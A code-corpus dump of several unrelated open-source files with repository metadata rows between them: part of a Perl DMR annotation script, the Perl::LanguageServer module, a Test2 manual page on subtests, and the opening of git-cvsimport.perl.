-DMR DMR file (bed format);
chr1 start end ...
-annot list of annotation infomation file (bed format);
#example for list file:
promoter path/promoter.bed
CGI path/CGI.bed
5utr path/5utr.bed
exon path/exon.bed
#format of promoter.bed :
chr1 start end ID annotation +
-help
example : perl $0 -DMR in.dmr -annot annot.list > in.dmr.annt.txt
author: luhanlin\@genomics.org.cn
date:
USAGE
my ($dmrfile, $annotlist, $help);
GetOptions (
"DMR=s" => \$dmrfile,
"annot=s" => \$annotlist,
"help" => \$help,
);
die $usage if $help;
die $usage unless $dmrfile && $annotlist;
my $getoverlap = "$Bin/disposeOverlap.pl";
#
print STDERR "|-- reading DMR file: $dmrfile ..\n";
my $tmp = "tmp.dmr.txt";
# my @head = ();
open DMR, $dmrfile or die $!;
open OUT, "> $tmp" or die $!;
while(<DMR>){
chomp;
if(/^#/){
next;
}
else{
my $dmrID = "DMR$.";
print OUT "$dmrID\t$_\n";
# @head = split(/\t/, $_);
}
}
close DMR;
close OUT;
#
my %res = ();
my @list = ();
print STDERR "|-- reading annotation file list ..\n";
open IN, $annotlist or die $!;
while(<IN>){
chomp;
my @aa = split(/\t/, $_);
my $name = $aa[0];
push @list, $name;
my $file = $aa[1];
my $output = "tmp.$name.overlap";
print STDERR "|-- overlap with ELEMENT: $name, \n\tfile: $file, \n\toutput: $output ..\n";
system("$getoverlap --i1 $tmp --f1 1-0-2-3 --i2 $file --f2 0-4-1-2 --OL 0.5-small --mN 1 --E O > $output");
print STDERR "|-- parse output: $output ..\n";
open IB, "$output" or die $!;
while(<IB>){
chomp;
next if $.==1;
my @bb = split;
my $dmrid = $bb[1];
my %u = ();
foreach my $ele (@bb[8..$#bb]){
my $id = (split(/:/, $ele))[0];
$u{$id} += 1;
}
my $annot_id = join(",", keys %u);
$res{$dmrid}{$name} = $annot_id;
}
close IB;
print STDERR "|-- remove output: $output ..\n";
system("rm -f $output");
}
close IN;
#
print STDERR "|-- write the result ..\n";
open IA, $tmp or die $!;
print join("\t", "chr", "start", "end", "q-value", "methyl-diff", "CpGs", "methyl_a", "methyl_b", @list), "\n";
while(<IA>){
chomp;
my @aa = split(/\t/, $_);
my $dmrid = $aa[0];
my @out = ();
foreach my $name (@list){
my $o = $res{$dmrid}{$name} ? $res{$dmrid}{$name} : "--";
push @out, $o;
}
print join("\t", @aa[1..$#aa], @out), "\n";
}
close IA;
system("rm -f $tmp");
print STDERR "|-- program is done .. \n\n\n";
# END
| 24.256198 | 115 | 0.517547 |
73ec87700b4b928a5a3737f458d4ef2fdcf102ce | 18,708 | pm | Perl | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | [
"MIT"
] | null | null | null | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | [
"MIT"
] | null | null | null | lib/Perl/LanguageServer.pm | kadavr/Perl-LanguageServer | 1d1654dc8ddee12b6bfefc42fc8169e35b442940 | [
"MIT"
] | null | null | null | package Perl::LanguageServer;
use v5.18;
use strict ;
use Moose ;
use Moose::Util qw( apply_all_roles );
use Coro ;
use Coro::AIO ;
use Coro::Handle ;
use AnyEvent;
use AnyEvent::Socket ;
use JSON ;
use Data::Dump qw{dump} ;
use IO::Select ;
use Perl::LanguageServer::Req ;
use Perl::LanguageServer::Workspace ;
with 'Perl::LanguageServer::Methods' ;
with 'Perl::LanguageServer::IO' ;
no warnings 'uninitialized' ;
=head1 NAME
Perl::LanguageServer - Language Server and Debug Protocol Adapter for Perl
=head1 VERSION
Version 2.0.1
=cut
our $VERSION = '2.0.2';
=head1 SYNOPSIS
This is a Language Server and Debug Protocol Adapter for Perl
It implements the Language Server Protocol which provides
syntax-checking, symbol search, etc. Perl to various editors, for
example Visual Stuido Code or Atom.
L<https://microsoft.github.io/language-server-protocol/specification>
It also implements the Debug Adapter Protocol, which allow debugging
with various editors/includes
L<https://microsoft.github.io/debug-adapter-protocol/overview>
To use both with Visual Studio Code, install the extention "perl"
Any comments and patches are welcome.
NOTE: This module uses Compiler::Lexer. The version on cpan (0.22) is buggy
crashes from time to time. For this reason a working version from github
is bundled with this module and will be installed when you run Makefile.PL.
L<https://github.com/goccy/p5-Compiler-Lexer>
=cut
our $json = JSON -> new -> utf8(1) -> ascii(1) ;
our $jsonpretty = JSON -> new -> utf8(1) -> ascii(1) -> pretty (1) ;
our %running_reqs ;
our %running_coros ;
our $exit ;
our $workspace ;
our $dev_tool ;
our $debug1 = 0 ;
our $debug2 = 0 ;
our $client_version ;
has 'channel' =>
(
is => 'ro',
isa => 'Coro::Channel',
default => sub { Coro::Channel -> new }
) ;
has 'debug' =>
(
is => 'rw',
isa => 'Int',
default => 1,
) ;
has 'listen_port' =>
(
is => 'rw',
isa => 'Maybe[Int]',
) ;
has 'roles' =>
(
is => 'rw',
isa => 'HashRef',
default => sub { {} },
) ;
has 'out_semaphore' =>
(
is => 'ro',
isa => 'Coro::Semaphore',
default => sub { Coro::Semaphore -> new }
) ;
has 'log_prefix' =>
(
is => 'rw',
isa => 'Str',
default => 'LS',
) ;
has 'log_req_txt' =>
(
is => 'rw',
isa => 'Str',
default => '---> Request: ',
) ;
# ---------------------------------------------------------------------------
sub logger
{
my $self = shift ;
my $src ;
if (!defined ($_[0]) || ref ($_[0]))
{
$src = shift ;
}
$src = $self if (!$src) ;
print STDERR $src?$src -> log_prefix . ': ':'', @_ ;
}
# ---------------------------------------------------------------------------
sub send_notification
{
my ($self, $notification, $src, $txt) = @_ ;
$txt ||= "<--- Notification: " ;
$notification -> {jsonrpc} = '2.0' ;
my $outdata = $json -> encode ($notification) ;
my $guard = $self -> out_semaphore -> guard ;
use bytes ;
my $len = length($outdata) ;
my $wrdata = "Content-Length: $len\r\nContent-Type: application/vscode-jsonrpc; charset=utf-8\r\n\r\n$outdata" ;
$self -> _write ($wrdata) ;
if ($debug1)
{
$wrdata =~ s/\r//g ;
$self -> logger ($src, $txt, $jsonpretty -> encode ($notification), "\n") if ($debug1) ;
}
}
# ---------------------------------------------------------------------------
sub call_method
{
my ($self, $reqdata, $req, $id) = @_ ;
my $method = $req -> is_dap?$reqdata -> {command}:$reqdata -> {method} ;
my $module ;
my $name ;
if ($method =~ /^(\w+)\/(\w+)$/)
{
$module = $1 ;
$name = $2 ;
}
elsif ($method =~ /^(\w+)$/)
{
$name = $1 ;
}
elsif ($method =~ /^\$\/(\w+)$/)
{
$name = $1 ;
}
else
{
die "Unknown methd $method" ;
}
$module = $req -> type eq 'dbgint'?'DebugAdapterInterface':'DebugAdapter' if ($req -> is_dap) ;
my $base_package = __PACKAGE__ . '::Methods' ;
my $package = $base_package ;
$package .= '::' . $module if ($module) ;
my $fn = $package . '.pm' ;
$fn =~ s/::/\//g ;
if (!exists $INC{$fn} || !exists $self -> roles -> {$fn})
{
#$self -> logger (dump (\%INC), "\n") ;
$self -> logger ("apply_all_roles ($self, $package, $fn)\n") ;
apply_all_roles ($self, $package) ;
$self -> roles -> {$fn} = 1 ;
}
my $perlmethod ;
if ($req -> is_dap)
{
$perlmethod = '_dapreq_' . $name ;
}
else
{
$perlmethod = (defined($id)?'_rpcreq_':'_rpcnot_') . $name ;
}
$self -> logger ("method=$perlmethod\n") if ($debug1) ;
die "Unknow perlmethod $perlmethod" if (!$self -> can ($perlmethod)) ;
no strict ;
return $self -> $perlmethod ($workspace, $req) ;
use strict ;
}
# ---------------------------------------------------------------------------
sub process_req
{
my ($self, $id, $reqdata) = @_ ;
$running_coros{$id} = async
{
my $req_guard = Guard::guard
{
delete $running_reqs{$id} ;
delete $running_coros{$id} ;
};
my $type = $reqdata -> {type} ;
my $is_dap = $type?1:0 ;
$type = defined ($id)?'request':'notification' if (!$type) ;
$self -> logger ("handle_req id=$id\n") if ($debug1) ;
my $req = Perl::LanguageServer::Req -> new ({ id => $id, is_dap => $is_dap, type => $type, params => $is_dap?$reqdata -> {arguments} || {}:$reqdata -> {params}}) ;
$running_reqs{$id} = $req ;
my $rsp ;
my $outdata ;
my $outjson ;
eval
{
$rsp = $self -> call_method ($reqdata, $req, $id) ;
$id = undef if (!$rsp) ;
if ($req -> is_dap)
{
$outjson = { request_seq => -$id, seq => -$id, command => $reqdata -> {command}, success => JSON::true, type => 'response', $rsp?(body => $rsp):()} ;
}
else
{
$outjson = { id => $id, jsonrpc => '2.0', result => $rsp} if ($rsp) ;
}
$outdata = $json -> encode ($outjson) if ($outjson) ;
} ;
if ($@)
{
$self -> logger ("ERROR: $@\n") ;
if ($req -> is_dap)
{
$outjson = { request_seq => -$id, command => $reqdata -> {command}, success => JSON::false, message => "$@", , type => 'response'} ;
}
else
{
$outjson = { id => $id, jsonrpc => '2.0', error => { code => -32001, message => "$@" }} ;
}
$outdata = $json -> encode ($outjson) if ($outjson) ;
}
if (defined($id))
{
my $guard = $self -> out_semaphore -> guard ;
use bytes ;
my $len = length ($outdata) ;
my $wrdata = "Content-Length: $len\r\nContent-Type: application/vscode-jsonrpc; charset=utf-8\r\n\r\n$outdata" ;
my $sum = 0 ;
my $cnt ;
while ($sum < length ($wrdata))
{
$cnt = $self -> _write ($wrdata, undef, $sum) ;
die "write_error ($!)" if ($cnt <= 0) ;
$sum += $cnt ;
}
if ($debug1)
{
$wrdata =~ s/\r//g ;
$self -> logger ("<--- Response: ", $jsonpretty -> encode ($outjson), "\n") ;
}
}
cede () ;
} ;
}
# ---------------------------------------------------------------------------
sub mainloop
{
my ($self) = @_ ;
my $buffer = '' ;
while (!$exit)
{
use bytes ;
my %header ;
my $line ;
my $cnt ;
my $loop ;
header:
while (1)
{
$self -> logger ("start aio read\n") if ($debug2) ;
$cnt = $self -> _read (\$buffer, 8192, length ($buffer), undef, 1) ;
$self -> logger ("end aio read cnt=$cnt\n") if ($debug2) ;
die "read_error reading headers ($!)" if ($cnt < 0) ;
return if ($cnt == 0) ;
while ($buffer =~ s/^(.*?)\R//)
{
$line = $1 ;
$self -> logger ("line=<$line>\n") if ($debug2) ;
last header if ($line eq '') ;
$header{$1} = $2 if ($line =~ /(.+?):\s*(.+)/) ;
}
$loop = 1 ;
}
my $len = $header{'Content-Length'} ;
return 1 if ($len == 0);
my $data ;
#$self -> logger ("len=$len len buffer=", length ($buffer), "\n") if ($debug2) ;
while ($len > length ($buffer))
{
$cnt = $self -> _read (\$buffer, $len - length ($buffer), length ($buffer)) ;
#$self -> logger ("cnt=$cnt len=$len len buffer=", length ($buffer), "\n") if ($debug2) ;
die "read_error reading data ($!)" if ($cnt < 0) ;
return if ($cnt == 0) ;
}
if ($len == length ($buffer))
{
$data = $buffer ;
$buffer = '' ;
}
elsif ($len < length ($buffer))
{
$data = substr ($buffer, 0, $len) ;
$buffer = substr ($buffer, $len) ;
}
else
{
die "to few data bytes" ;
}
$self -> logger ("read data=", $data, "\n") if ($debug2) ;
$self -> logger ("read header=", dump (\%header), "\n") if ($debug2) ;
my $reqdata ;
$reqdata = $json -> decode ($data) if ($data) ;
if ($debug1)
{
$self -> logger ($self -> log_req_txt, $jsonpretty -> encode ($reqdata), "\n") ;
}
my $id = $reqdata -> {type}?-$reqdata -> {seq}:$reqdata -> {id};
$self -> process_req ($id, $reqdata) ;
cede () ;
}
return 1 ;
}
# ---------------------------------------------------------------------------
sub _run_tcp_server
{
my ($listen_port) = @_ ;
if ($listen_port)
{
my $quit ;
while (!$quit && !$exit)
{
logger (undef, "tcp server start listen on port $listen_port\n") ;
my $tcpcv = AnyEvent::CondVar -> new ;
my $guard ;
eval
{
$guard = tcp_server '127.0.0.1', $listen_port, sub
{
my ($fh, $host, $port) = @_ ;
async
{
eval
{
$fh = Coro::Handle::unblock ($fh) ;
my $self = Perl::LanguageServer -> new ({out_fh => $fh, in_fh => $fh, log_prefix => 'DAx'});
$self -> logger ("connect from $host:$port\n") ;
$self -> listen_port ($listen_port) ;
$quit = $self -> mainloop () ;
$self -> logger ("got quit signal\n") if ($quit) ;
} ;
logger (undef, $@) if ($@) ;
if ($fh)
{
close ($fh) ;
$fh = undef ;
}
$tcpcv -> send if ($quit || $exit);
} ;
} ;
} ;
if (!$@)
{
$tcpcv -> recv ;
}
else
{
$guard = undef ;
logger (undef, $@) ;
#$quit = 1 ;
if (!$guard && ($@ =~ /Address already in use/))
{
# stop other server
tcp_connect '127.0.0.1', $listen_port, sub
{
my ($fh) = @_ ;
syswrite ($fh, "Content-Length: 0\r\n\r\n") if ($fh) ;
} ;
}
$@ = undef ;
Coro::AnyEvent::sleep (1) ;
exit (1) ; # stop LS, vscode will restart it
}
}
}
}
# ---------------------------------------------------------------------------
sub run
{
my $listen_port ;
my $no_stdio ;
my $heartbeat ;
while (my $opt = shift @ARGV)
{
if ($opt eq '--debug')
{
$debug1 = $debug2 = 1 ;
}
elsif ($opt eq '--log-level')
{
$debug1 = shift @ARGV ;
$debug2 = $debug1 > 1?1:0 ;
}
elsif ($opt eq '--port')
{
$listen_port = shift @ARGV ;
}
elsif ($opt eq '--nostdio')
{
$no_stdio = 1 ;
}
elsif ($opt eq '--heartbeat')
{
$heartbeat = 1 ;
}
elsif ($opt eq '--version')
{
$client_version = shift @ARGV ;
}
}
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
if ($heartbeat)
{
async
{
my $i = 0 ;
while (1)
{
print STDERR "#####$i\n" ;
Coro::AnyEvent::sleep (3) ;
$i++ ;
}
} ;
}
if (!$no_stdio)
{
async
{
my $self = Perl::LanguageServer -> new ({out_fh => 1, in_fh => 0});
$self -> mainloop () ;
$cv -> send ;
} ;
}
async
{
_run_tcp_server ($listen_port) ;
} ;
$cv -> recv ;
$exit = 1 ;
}
# ---------------------------------------------------------------------------
sub parsews
{
my $class = shift ;
my @args = @_ ;
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
async
{
my $self = Perl::LanguageServer -> new ;
$workspace = Perl::LanguageServer::Workspace -> new ({ config => {} }) ;
my %folders ;
foreach my $path (@args)
{
$folders{$path} = $path ;
}
$workspace -> folders (\%folders) ;
$workspace -> background_parser ($self) ;
$cv -> send ;
} ;
$cv -> recv ;
}
# ---------------------------------------------------------------------------
sub check_file
{
my $class = shift ;
my @args = @_ ;
$|= 1 ;
my $cv = AnyEvent::CondVar -> new ;
my $self = Perl::LanguageServer -> new ;
$workspace = Perl::LanguageServer::Workspace -> new ({ config => {} }) ;
async
{
my %folders ;
foreach my $path (@args)
{
$folders{$path} = $path ;
}
$workspace -> folders (\%folders) ;
$workspace -> background_checker ($self) ;
$cv -> send ;
} ;
async
{
foreach my $path (@args)
{
my $text ;
aio_load ($path, $text) ;
$workspace -> check_perl_syntax ($workspace, $path, $text) ;
}
} ;
$cv -> recv ;
}
=pod
=head1 AUTHOR
grichter, C<< <richter at ecos.de> >>
=head1 BUGS
Please report any bugs or feature requests to C<bug-perl-languageserver at rt.cpan.org>, or through
the web interface at L<http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Perl-LanguageServer>. I will be notified, and then you'll
automatically be notified of progress on your bug as I make changes.
=head1 SUPPORT
You can find documentation for this module with the perldoc command.
perldoc Perl::LanguageServer
You can also look for information at:
=over 4
=item * Github:
L<https://github.com/richterger/Perl-LanguageServer>
=item * RT: CPAN's request tracker (report bugs here)
L<http://rt.cpan.org/NoAuth/Bugs.html?Dist=Perl-LanguageServer>
=item * AnnoCPAN: Annotated CPAN documentation
L<http://annocpan.org/dist/Perl-LanguageServer>
=item * CPAN Ratings
L<http://cpanratings.perl.org/d/Perl-LanguageServer>
=item * Search CPAN
L<http://search.cpan.org/dist/Perl-LanguageServer/>
=back
=head1 ACKNOWLEDGEMENTS
=head1 LICENSE AND COPYRIGHT
Copyright 2018-2020 grichter.
This program is free software; you can redistribute it and/or modify it
under the terms of the the Artistic License (2.0). You may obtain a
copy of the full license at:
L<http://www.perlfoundation.org/artistic_license_2_0>
Any use, modification, and distribution of the Standard or Modified
Versions is governed by this Artistic License. By using, modifying or
distributing the Package, you accept this license. Do not use, modify,
or distribute the Package, if you do not accept this license.
If your Modified Version has been derived from a Modified Version made
by someone other than you, you are nevertheless required to ensure that
your Modified Version complies with the requirements of this license.
This license does not grant you the right to use any trademark, service
mark, tradename, or logo of the Copyright Holder.
This license includes the non-exclusive, worldwide, free-of-charge
patent license to make, have made, use, offer to sell, sell, import and
otherwise transfer the Package with respect to any patent claims
licensable by the Copyright Holder that are necessarily infringed by the
Package. If you institute patent litigation (including a cross-claim or
counterclaim) against any party alleging that the Package constitutes
direct or contributory patent infringement, then this Artistic License
to you shall terminate on the date that such litigation is filed.
Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER
AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES.
THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE, OR NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY
YOUR LOCAL LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR
CONTRIBUTOR WILL BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR
CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
=cut
1; # End of Perl::LanguageServer
| 26.956772 | 172 | 0.461621 |
ed98712ff8336b90e27a3eddbc8c82143302ca53 | 4,049 | pm | Perl | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/Test2/Manual/Tooling/Subtest.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | package Test2::Manual::Tooling::Subtest;
use strict;
use warnings;
our $VERSION = '0.000129';
1;
__END__
=head1 NAME
Test2::Manual::Tooling::Subtest - How to implement a tool that makes use of
subtests.
=head1 DESCRIPTION
Subtests are a nice way of making related events visually, and architecturally
distinct.
=head1 WHICH TYPE OF SUBTEST DO I NEED?
There are 2 types of subtest. The first type is subtests with user-supplied
coderefs, such as the C<subtest()> function itself. The second type is subtest
that do not have any user supplied coderefs.
So which type do you need? The answer to that is simple, if you are going to
let the user define the subtest with their own codeblock, you have the first
type, otherwise you have the second.
In either case, you will still need use the same API function:
C<Test2::API::run_subtest>.
=head2 SUBTEST WITH USER SUPPLIED CODEREF
This example will emulate the C<subtest> function.
use Test2::API qw/context run_subtest/;
sub my_subtest {
my ($name, $code) = @_;
# Like any other tool, you need to acquire a context, if you do not then
# things will not report the correct file and line number.
my $ctx = context();
my $bool = run_subtest($name, $code);
$ctx->release;
return $bool;
}
This looks incredibly simple... and it is. C<run_subtest()> does all the hard
work for you. This will issue an L<Test2::Event::Subtest> event with the
results of the subtest. The subtest event itself will report to the proper file
and line number due to the context you acquired (even though it does not I<look>
like you used the context.
C<run_subtest()> can take additional arguments:
run_subtest($name, $code, \%params, @args);
=over 4
=item @args
This allows you to pass arguments into the codeblock that gets run.
=item \%params
This is a hashref of parameters. Currently there are 3 possible parameters:
=over 4
=item buffered => $bool
This will turn the subtest into the new style buffered subtest. This type of
subtest is recommended, but not default.
=item inherit_trace => $bool
This is used for tool-side coderefs.
=item no_fork => $bool
react to forking/threading inside the subtest itself. In general you are
unlikely to need/want this parameter.
=back
=back
=head2 SUBTEST WITH TOOL-SIDE CODEREF
This is particularly useful if you want to turn a tool that wraps other tools
into a subtest. For this we will be using the tool we created in
L<Test2::Manual::Tooling::Nesting>.
use Test2::API qw/context run_subtest/;
sub check_class {
my $class = shift;
my $ctx = context();
my $code = sub {
my $obj = $class->new;
is($obj->foo, 'foo', "got foo");
is($obj->bar, 'bar', "got bar");
};
my $bool = run_subtest($class, $code, {buffered => 1, inherit_trace => 1});
$ctx->release;
return $bool;
}
The C<run_subtest()> function does all the heavy lifting for us. All we need
to do is give the function a name, a coderef to run, and the
C<< inherit_trace => 1 >> parameter. The C<< buffered => 1 >> parameter is
optional, but recommended.
The C<inherit_trace> parameter tells the subtest tool that the contexts acquired
inside the nested tools should use the same trace as the subtest itself. For
user-supplied codeblocks you do not use inherit_trace because you want errors
to report to the user-supplied file+line.
=head1 SEE ALSO
L<Test2::Manual> - Primary index of the manual.
=head1 SOURCE
The source code repository for Test2-Manual can be found at
F<https://github.com/Test-More/Test2-Suite/>.
=head1 MAINTAINERS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 AUTHORS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 COPYRIGHT
Copyright 2018 Chad Granum E<lt>exodist@cpan.orgE<gt>.
This program is free software; you can redistribute it and/or
modify it under the same terms as Perl itself.
See F<http://dev.perl.org/licenses/>
=cut
| 24.539394 | 83 | 0.71104 |
73d367cea8f130bc7721803e397df710e7cfff58 | 32,019 | perl | Perl | git-2.4.0/git-cvsimport.perl | riritn1111/heroku_app | f5e1f3f86215b78f398e8b1c2c7d98096a6e90b5 | [
"MIT"
] | null | null | null | git-2.4.0/git-cvsimport.perl | riritn1111/heroku_app | f5e1f3f86215b78f398e8b1c2c7d98096a6e90b5 | [
"MIT"
] | 3 | 2020-02-26T00:45:02.000Z | 2020-03-04T17:03:58.000Z | git-2.2.1/git-cvsimport.perl | daikohunter128/EdamameApp | e702b45ad8ecebd782ffa6650ac2b32f9d17ef34 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
# This tool is copyright (c) 2005, Matthias Urlichs.
# It is released under the Gnu Public License, version 2.
#
# The basic idea is to aggregate CVS check-ins into related changes.
# Fortunately, "cvsps" does that for us; all we have to do is to parse
# its output.
#
# Checking out the files is done by a single long-running CVS connection
# / server process.
#
# The head revision is on branch "origin" by default.
# You can change that with the '-o' option.
use 5.008;
use strict;
use warnings;
use Getopt::Long;
use File::Spec;
use File::Temp qw(tempfile tmpnam);
use File::Path qw(mkpath);
use File::Basename qw(basename dirname);
use Time::Local;
use IO::Socket;
use IO::Pipe;
use POSIX qw(strftime tzset dup2 ENOENT);
use IPC::Open2;
use Git qw(get_tz_offset);
$SIG{'PIPE'}="IGNORE";
set_timezone('UTC');
our ($opt_h,$opt_o,$opt_v,$opt_k,$opt_u,$opt_d,$opt_p,$opt_C,$opt_z,$opt_i,$opt_P, $opt_s,$opt_m,@opt_M,$opt_A,$opt_S,$opt_L, $opt_a, $opt_r, $opt_R);
my (%conv_author_name, %conv_author_email, %conv_author_tz);
sub usage(;$) {
my $msg = shift;
print(STDERR "Error: $msg\n") if $msg;
print STDERR <<END;
usage: git cvsimport # fetch/update GIT from CVS
[-o branch-for-HEAD] [-h] [-v] [-d CVSROOT] [-A author-conv-file]
[-p opts-for-cvsps] [-P file] [-C GIT_repository] [-z fuzz] [-i] [-k]
[-u] [-s subst] [-a] [-m] [-M regex] [-S regex] [-L commitlimit]
[-r remote] [-R] [CVS_module]
END
exit(1);
}
sub read_author_info($) {
my ($file) = @_;
my $user;
open my $f, '<', "$file" or die("Failed to open $file: $!\n");
while (<$f>) {
# Expected format is this:
# exon=Andreas Ericsson <ae@op5.se>
if (m/^(\S+?)\s*=\s*(.+?)\s*<(.+)>\s*$/) {
$user = $1;
$conv_author_name{$user} = $2;
$conv_author_email{$user} = $3;
}
# or with an optional timezone:
# spawn=Simon Pawn <spawn@frog-pond.org> America/Chicago
elsif (m/^(\S+?)\s*=\s*(.+?)\s*<(.+)>\s*(\S+?)\s*$/) {
$user = $1;
$conv_author_name{$user} = $2;
$conv_author_email{$user} = $3;
$conv_author_tz{$user} = $4;
}
# However, we also read from CVSROOT/users format
# to ease migration.
elsif (/^(\w+):(['"]?)(.+?)\2\s*$/) {
my $mapped;
($user, $mapped) = ($1, $3);
if ($mapped =~ /^\s*(.*?)\s*<(.*)>\s*$/) {
$conv_author_name{$user} = $1;
$conv_author_email{$user} = $2;
}
elsif ($mapped =~ /^<?(.*)>?$/) {
$conv_author_name{$user} = $user;
$conv_author_email{$user} = $1;
}
}
# NEEDSWORK: Maybe warn on unrecognized lines?
}
close ($f);
}
sub write_author_info($) {
my ($file) = @_;
open my $f, '>', $file or
die("Failed to open $file for writing: $!");
foreach (keys %conv_author_name) {
print $f "$_=$conv_author_name{$_} <$conv_author_email{$_}>";
print $f " $conv_author_tz{$_}" if ($conv_author_tz{$_});
print $f "\n";
}
close ($f);
}
# Versions of perl before 5.10.0 may not automatically check $TZ each
# time localtime is run (most platforms will do so only the first time).
# We can work around this by using tzset() to update the internal
# variable whenever we change the environment.
sub set_timezone {
$ENV{TZ} = shift;
tzset();
}
# convert getopts specs for use by git config
my %longmap = (
'A:' => 'authors-file',
'M:' => 'merge-regex',
'P:' => undef,
'R' => 'track-revisions',
'S:' => 'ignore-paths',
);
sub read_repo_config {
# Split the string between characters, unless there is a ':'
# So "abc:de" becomes ["a", "b", "c:", "d", "e"]
my @opts = split(/ *(?!:)/, shift);
foreach my $o (@opts) {
my $key = $o;
$key =~ s/://g;
my $arg = 'git config';
$arg .= ' --bool' if ($o !~ /:$/);
my $ckey = $key;
if (exists $longmap{$o}) {
# An uppercase option like -R cannot be
# expressed in the configuration, as the
# variable names are downcased.
$ckey = $longmap{$o};
next if (! defined $ckey);
$ckey =~ s/-//g;
}
chomp(my $tmp = `$arg --get cvsimport.$ckey`);
if ($tmp && !($arg =~ /--bool/ && $tmp eq 'false')) {
no strict 'refs';
my $opt_name = "opt_" . $key;
if (!$$opt_name) {
$$opt_name = $tmp;
}
}
}
}
my $opts = "haivmkuo:d:p:r:C:z:s:M:P:A:S:L:R";
read_repo_config($opts);
Getopt::Long::Configure( 'no_ignore_case', 'bundling' );
# turn the Getopt::Std specification in a Getopt::Long one,
# with support for multiple -M options
GetOptions( map { s/:/=s/; /M/ ? "$_\@" : $_ } split( /(?!:)/, $opts ) )
or usage();
usage if $opt_h;
if (@ARGV == 0) {
chomp(my $module = `git config --get cvsimport.module`);
push(@ARGV, $module) if $? == 0;
}
@ARGV <= 1 or usage("You can't specify more than one CVS module");
if ($opt_d) {
$ENV{"CVSROOT"} = $opt_d;
} elsif (-f 'CVS/Root') {
open my $f, '<', 'CVS/Root' or die 'Failed to open CVS/Root';
$opt_d = <$f>;
chomp $opt_d;
close $f;
$ENV{"CVSROOT"} = $opt_d;
} elsif ($ENV{"CVSROOT"}) {
$opt_d = $ENV{"CVSROOT"};
} else {
usage("CVSROOT needs to be set");
}
$opt_s ||= "-";
$opt_a ||= 0;
my $git_tree = $opt_C;
$git_tree ||= ".";
my $remote;
if (defined $opt_r) {
$remote = 'refs/remotes/' . $opt_r;
$opt_o ||= "master";
} else {
$opt_o ||= "origin";
$remote = 'refs/heads';
}
my $cvs_tree;
if ($#ARGV == 0) {
$cvs_tree = $ARGV[0];
} elsif (-f 'CVS/Repository') {
open my $f, '<', 'CVS/Repository' or
die 'Failed to open CVS/Repository';
$cvs_tree = <$f>;
chomp $cvs_tree;
close $f;
} else {
usage("CVS module has to be specified");
}
our @mergerx = ();
if ($opt_m) {
@mergerx = ( qr/\b(?:from|of|merge|merging|merged) ([-\w]+)/i );
}
if (@opt_M) {
push (@mergerx, map { qr/$_/ } @opt_M);
}
# Remember UTC of our starting time
# we'll want to avoid importing commits
# that are too recent
our $starttime = time();
select(STDERR); $|=1; select(STDOUT);
package CVSconn;
# Basic CVS dialog.
# We're only interested in connecting and downloading, so ...
use File::Spec;
use File::Temp qw(tempfile);
use POSIX qw(strftime dup2);
sub new {
my ($what,$repo,$subdir) = @_;
$what=ref($what) if ref($what);
my $self = {};
$self->{'buffer'} = "";
bless($self,$what);
$repo =~ s#/+$##;
$self->{'fullrep'} = $repo;
$self->conn();
$self->{'subdir'} = $subdir;
$self->{'lines'} = undef;
return $self;
}
sub find_password_entry {
my ($cvspass, @cvsroot) = @_;
my ($file, $delim) = @$cvspass;
my $pass;
local ($_);
if (open(my $fh, $file)) {
# :pserver:cvs@mea.tmt.tele.fi:/cvsroot/zmailer Ah<Z
CVSPASSFILE:
while (<$fh>) {
chomp;
s/^\/\d+\s+//;
my ($w, $p) = split($delim,$_,2);
for my $cvsroot (@cvsroot) {
if ($w eq $cvsroot) {
$pass = $p;
last CVSPASSFILE;
}
}
}
close($fh);
}
return $pass;
}
sub conn {
my $self = shift;
my $repo = $self->{'fullrep'};
if ($repo =~ s/^:pserver(?:([^:]*)):(?:(.*?)(?::(.*?))?@)?([^:\/]*)(?::(\d*))?//) {
my ($param,$user,$pass,$serv,$port) = ($1,$2,$3,$4,$5);
my ($proxyhost,$proxyport);
if ($param && ($param =~ m/proxy=([^;]+)/)) {
$proxyhost = $1;
# Default proxyport, if not specified, is 8080.
$proxyport = 8080;
if ($ENV{"CVS_PROXY_PORT"}) {
$proxyport = $ENV{"CVS_PROXY_PORT"};
}
if ($param =~ m/proxyport=([^;]+)/) {
$proxyport = $1;
}
}
$repo ||= '/';
# if username is not explicit in CVSROOT, then use current user, as cvs would
$user=(getlogin() || $ENV{'LOGNAME'} || $ENV{'USER'} || "anonymous") unless $user;
my $rr2 = "-";
unless ($port) {
$rr2 = ":pserver:$user\@$serv:$repo";
$port=2401;
}
my $rr = ":pserver:$user\@$serv:$port$repo";
if ($pass) {
$pass = $self->_scramble($pass);
} else {
my @cvspass = ([$ENV{'HOME'}."/.cvspass", qr/\s/],
